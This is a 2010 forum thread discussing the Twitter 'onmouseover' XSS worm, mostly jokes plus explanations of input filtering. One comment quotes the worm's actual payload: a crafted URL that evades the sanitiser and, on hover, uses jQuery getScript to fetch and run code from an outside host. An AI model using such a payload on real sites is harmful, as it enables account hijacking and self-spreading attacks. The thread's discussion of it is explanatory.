Twitter worms
September 21, 2010 10:15 AM   Subscribe

I feel such schadenfreude
posted by acheekymonkey at 10:19 AM on September 21, 2010

This must explain all the misspellings and non sequiturs posted on Courtney Love's account.
posted by Joe Beese at 10:22 AM on September 21, 2010 [10 favorites]

Netcraft confirms it!
posted by delmoi at 10:24 AM on September 21, 2010 [1 favorite]

No, they had a fix three hours before you posted this to Metafilter. Here's Twitter's explanation.
posted by Nelson at 10:25 AM on September 21, 2010 [3 favorites]

Activating content without consent via mouse over? I've seen that vulnerability before, but it usually seems to launch ads for legit companies instead of porn sites.
posted by furiousxgeorge at 10:25 AM on September 21, 2010 [7 favorites]

LOLTwitter
posted by fourcheesemac at 10:30 AM on September 21, 2010

This is the second XSS vulnerability I've seen in the last month. While this is normal considering Twitter's popularity, it does show how easy is to affect a large amount of accounts due to the way Twitter works.
posted by Memo at 10:30 AM on September 21, 2010

Today was a weird morning on twitter. This bug seemed to mostly affect UK users (or at least all the UK users that I follow had this problem and were complaining about it.) I'm guessing it's due to the fact that the bug occurred during the workday UK time.
posted by ob at 10:31 AM on September 21, 2010

Yeah, while this is news in a general way, this specific vulnerability has been patched.

There might probably be more attacks in the future. A good analysis of Twitter's vulnerabilities and how its role as a centralized online medium makes it a prominent target would be a lot more interesting than a phear-haxxors post over a now-dead issue.
posted by ardgedee at 10:32 AM on September 21, 2010 [1 favorite]

Ex-British PM!
posted by chorltonmeateater at 10:33 AM on September 21, 2010 [4 favorites]

No, they had a fix three hours before you posted this to Metafilter

I think Chocolate Pickle may be posting from the past, unless Sarah Brown married David Cameron without my noticing.
posted by a little headband I put around my throat at 10:38 AM on September 21, 2010 [4 favorites]

I'm sort of surprised by how easy that is. I guess the temptation is to think of hacking as really hard, but that seems like fairly standard javascript exploitation and I understand it without much scripting background.
posted by codacorolla at 10:40 AM on September 21, 2010

If this had made it over to the US, Rick Sanchez would be having a very bad day.
posted by NationalKato at 10:45 AM on September 21, 2010 [2 favorites]

I'm sort of surprised by how easy that is. I guess the temptation is to think of hacking as really hard, but that seems like fairly standard javascript exploitation and I understand it without much scripting background.

#knowingishalfthebattle
posted by Dark Messiah at 10:47 AM on September 21, 2010 [1 favorite]

There was a fix, unfortunately, due to the length of the code necessary to implement it, before they could roll it out, they ran out of spa
posted by mmrtnt at 10:49 AM on September 21, 2010 [18 favorites]

Good thing Twitter isn't monetized, or hooked up to bank accounts, etc.
posted by Blazecock Pileon at 10:51 AM on September 21, 2010 [1 favorite]

You know what they say about early birds...
posted by MrGuilt at 10:52 AM on September 21, 2010 [1 favorite]

My former UK Prime Minister's wife was re-directed to a Japanese porn site and all I got was this lousy t-shirt.
posted by Mike D at 10:54 AM on September 21, 2010 [1 favorite]

In the mean time, the twitter page belonging to the wife of the British PM has been hacked, making it redirect to a Japanese porn site.

And then, they'll find out that the Daleks were behind it all...
posted by spinifex23 at 10:57 AM on September 21, 2010 [2 favorites]

Ha! That is nothing compared with the current ASP.net exploit crisis.
posted by Artw at 10:59 AM on September 21, 2010

It's getting to the point where I think I am going to have to write XSS and cross-site request forgery exploits to get a better handle on the problem. I find performing a test exploit against a toy case to be very helpful in formulating methods of defense. This case probably isn't too applicable to the kind of programming I do, but it wouldn't hurt to get a feel for it.

However, this seems like the instances of XSS are actually riding on the back of what appears to be a rookie mistake. I do not mean to LOLTWITTER but executing Javascript out of nowhere just seems ... unwise on the face of it.
posted by adipocere at 11:05 AM on September 21, 2010 [2 favorites]

Cheeky bastards
posted by nomadicink at 11:13 AM on September 21, 2010

It may seem unwise to execute Javascript out of nowhere, but I wonder how many twitter users actually know what Javascript even is, and how many of their friends' feeds could have been hacked?

(Heck, I'm stupid enough to have fallen for a Facebook worm that required you to cut and paste a string of text into your address bar.)
posted by not_on_display at 11:14 AM on September 21, 2010

I was laughing at myself all day over this. I KNEW not to hover over any of the 'bad' tweets, but I'd forget for just a split second and GAH!!!

This is, incidentally why I suck at minesweeper (what? random clicking is bad? that's half the fun!)
posted by iamkimiam at 11:16 AM on September 21, 2010

Oh, and I also made a minigame out of trying to navigate to my-tweets-only page to delete the RTs, but not compounding the issue with accidental bad tweet hovers, while still getting close enough to them to get the 'Delete Tweet' button to show. It was fun.
posted by iamkimiam at 11:18 AM on September 21, 2010

I'm curious: did the supposed sandboxing aspect of the Chrome browser protect against this XSS exploit?
posted by sharkfu at 11:19 AM on September 21, 2010

I'm sort of surprised by how easy that is. I guess the temptation is to think of hacking as really hard, but that seems like fairly standard javascript exploitation and I understand it without much scripting background.

That's why it is so common. XSS : Hacking :: Stealing a GPS from an unlocked car : Thievery
posted by davejay at 11:21 AM on September 21, 2010 [1 favorite]

Heck, I'm stupid enough to have fallen for a Facebook worm that required you to cut and paste a string of text into your address bar.

Is that why half my Facebook friends are suddenly liking DAD CAUGHT HIS DAUGHTER IN THE ACT! CLICK HERE TO SEE! ?
posted by bondcliff at 11:26 AM on September 21, 2010

I was wondering how The Doctor was able to write such an amazing viral program (it's a little bit alive!) via a cellphone. He's on Twitter!
posted by m@f at 11:27 AM on September 21, 2010 [3 favorites]

No, I'd get a new social circle.
posted by nomadicink at 11:27 AM on September 21, 2010

sharkfu: "I'm curious: did the supposed sandboxing aspect of the Chrome browser protect against this XSS exploit?"

I doubt it. Chrome's sandbox is about "Website -> System" vulnerabilities (malware), not "Website -> Website" (XSS).
posted by Memo at 11:28 AM on September 21, 2010 [1 favorite]

O brave new world! That has such people in it!
posted by Turtles all the way down at 11:43 AM on September 21, 2010

By 7:00 am PDT, the primary issue was solved.

And we came so close to ending the menace of Justin Bieber forever... *sob*
posted by Halloween Jack at 12:09 PM on September 21, 2010

I do not mean to LOLTWITTER but executing Javascript out of nowhere just seems ... unwise on the face of it.

Well of course it's unwise and a rookie mistake, but to characterize it as "executing JS out of nowhere" is pretty misleading. Firstly it's not Twitter that is executing anything, they're simply allowing input to pass through their system without proper filtering. They had filters in place to prevent most forms of this, but someone just found an edge case where they could sneak something by the filters.

I mean, the problem is pretty simple really. If you typed the following in a text editor, saved it as foo.html, then opened that html file in your browser, and then hovered over the word 'here', you would get a popup box:

Hover over <a onmouseover="alert('hello')">this</a>

Now, consider the most primitive form of a twitter-like service that ever existed, in pseudocode: Step 1: Ask user for thier tweet. Step 2: Print out tweet on website. If I entered the above code for my tweet and the primitive twitter-like service printed it out on their website, then suddenly the twitter site contains instructions for the user's browser to display a popup message when the user hovered over the word. The primitive twitter-like service had nothing to do with executing script or anything like that, it just took some user input and repeated it on their site. That's the problem in a nutshell -- if you take user input you have to filter it to remove the bad things, because otherwise users can make your site say things you don't want it to say. And doing that filtering is hard. A lot of sites take the approach of not even letting users input anything that resembles a HTML tag -- the < gets escaped immediately so that it means less-than-sign and not the beginning of a html tag. They then re-invent all the HTML tags over again using some other syntax, like [b]bold[/b]. That way, anything resembling HTML gets escaped and you don't have to worry about letting some of it through and not letting other parts of it through.
posted by Rhomboid at 12:13 PM on September 21, 2010 [7 favorites]

I guess it's a good time to mention Jarlsburg, Google's interesting web security tutorial. Even a programming NoOb can understand it.
posted by melissam at 12:16 PM on September 21, 2010 [5 favorites]

It's funny because in Jarlsburg you learn about XSS exploits through a fake-twitter-like service.
posted by melissam at 12:17 PM on September 21, 2010

Yeah, I found this particular hack a bit insidious because it punished my habit of mousing over links before clicking on them. A habit I developed so that I don't get sent to malicious websites and/or rickrolled.

Twitter, I had to give you up. You let me down. You ran around and I had to deserted you.
posted by maryr at 12:22 PM on September 21, 2010 [2 favorites]

sharkfu: no, chrome was vulnerable, from experience unfortunately. What are those weird black, oh no!
posted by rhyax at 12:24 PM on September 21, 2010

All I want to know is if this hack did anything to get me more followers.

*checks*

Nope.

Stupid hack. Try harder next time!
posted by quin at 12:43 PM on September 21, 2010

Ex-British PM!

They've revoked his passport, too? You guys run some serious elections. Win and you're prime minister; lose and it's time to start seeking asylum elsewhere.
posted by pracowity at 12:47 PM on September 21, 2010 [6 favorites]

There's a good explanation of this on, of all places, pastebin.

Twitter sanitises most URLs OK - but twitter handles the @ symbol specially - in a way that apparently breaks the URL sanitiser.

So someone tweets this:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/

the URL sanitiser chokes on the @ and misses the second http:\\ due to the unicode backslashes, and Twitter posts web pages with huge bits of text which, on mouseover, use jQuery to download and run a script.
posted by Mike1024 at 1:27 PM on September 21, 2010 [1 favorite]

Yes, but is it good anime?
posted by buzzman at 1:45 PM on September 21, 2010

... but twitter handles the @ symbol specially ...

This just gets more and more delicious.
posted by odinsdream at 1:52 PM on September 21, 2010

Can we go back to "finger" now?
posted by pashdown at 2:07 PM on September 21, 2010 [6 favorites]

"In the mean time, the twitter page belonging to the wife of the British PM has been hacked, making it redirect to a Japanese porn site."

And then, they'll find out that the Daleks were behind it all...

That explains the tweet-spam I've been getting for Dalek S3X T0Y5.
posted by sebastienbailard at 2:52 PM on September 21, 2010

I've been thinking about this problem for a long time. I think HTML forms, JavaScript and document integration needs to be redone. We have to define more walls between things. For example scripts and style sheets should have to be by reference and not inline. So for example a document anchor tag would not have a onmouseover attribute that slipped into java or vbscript. Instead the anchor would have an id and a separate script would declare the events. Presumably this would limit the ability for events to be injected by simply modifying the document itself. Similarly end user input should be referenced in a separate document and pulled in. Ideally this input would be identified in the response header as untrusted, no script, no embed content. Finally I really find the whole flash embedded applet thing to be a giant open door. The flash / applet objects ability to rewrite the base HTML page and ignore all the security setting sucks. And don't get me started in the fact that we still have ssl free transactions or the need for http to be able to accommodate better type checking and input checking. The multipart mime request Aka file upload is and evil concept along with the entire post and get cgi spec.
posted by humanfont at 6:00 PM on September 21, 2010

I just finished re-reading Snow Crash this afternoon, so this is oddly unsurprising.
posted by Evilspork at 8:45 PM on September 21, 2010

That explains the tweet-spam I've been getting for Dalek S3X T0Y5.

EXHILARATE EXHILARATE EXHILARATE EXHILARATE...
posted by pracowity at 9:20 PM on September 21, 2010 [2 favorites]

Y'all got it wrong. It's a regression issue:

We discovered and patched this issue last month. However, a recent site update (unrelated to new Twitter) unknowingly resurfaced it."

The way I see it, that's worse than having an unpatched XSS vulnerability.
posted by the cydonian at 9:38 PM on September 21, 2010

The way this worm spread was fairly revealing. A Japanese guy discovered the magic combo, and used it to turn Twitter into a work of art ("Rainbow Twitter"). An Australian guy commented on possible malicious uses, an American guy created an obnoxious self-replicating tweet, and some Russians turned it into malware.

Thereafter, the Japanese media credited their own guy with discovering the exploit, the Australians credited their own, the Americans mostly credited the Australians, and the Russians... well, do they even have a functioning media?
posted by shii at 12:32 AM on September 22, 2010 [2 favorites]

I'm curious: did the supposed sandboxing aspect of the Chrome browser protect against this XSS exploit?

Nope; the magic of XSS is that it is treated by the browser as if it originated from the page's domain, because it did. Getting JS in a place where it's originating from the page's domain is the whole point of it.

For what it's worth, this happens all the time, even with the big guys. I still remember years ago, working at a very large internet company (who had just acquired the smaller guys I was working with) when we got hit with one -- I fixed it so quickly that I became the de facto "expert" on them and spent the next two weeks closing what felt like an endless stream of them across various codebases.

This is why whitelisting user input is always a good idea.
posted by davejay at 9:51 AM on September 22, 2010 [1 favorite]

This is why whitelisting user input is always a good idea.

Maybe a WW1 style tweetcard where you choose between pre-approved sentences to form your tweet?
posted by Mike1024 at 3:35 PM on September 22, 2010 [1 favorite]